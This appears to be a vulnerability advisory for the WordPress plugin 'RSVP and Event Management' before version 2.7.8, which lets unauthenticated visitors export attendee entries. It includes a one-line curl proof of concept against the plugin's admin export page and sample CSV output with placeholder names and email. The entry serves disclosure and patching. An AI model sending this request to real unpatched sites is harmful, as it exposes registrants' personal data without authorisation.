WordPress Plugin Vulnerabilities

RSVP and Event Management < 2.7.8 - Unauthenticated Entries Export

Description

The plugin does not have any authorisation checks when exporting its entries, and has the export function hooked to the init action. As a result, unauthenticated attackers could call it and retrieve PII such as first name, last name and email address of users registered for events

Proof of Concept

curl "https://example.com/wp-admin/admin.php?page=rsvp-admin-export"

"First Name","Last Name","Email","RSVP Status","Kids Meal","Associated Attendees","Vegetarian","Note","Additional Attendee","pre-fill URL"
"test","test","secret@example.com","Yes","N","","N","","N",""

Affects Plugins

Fixed in 2.7.8

References

Classification

Type
NO AUTHORISATION
CWE
CVSS

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes

Timeline

Publicly Published
2022-03-28 (about 2 years ago)
Added
2022-03-28 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other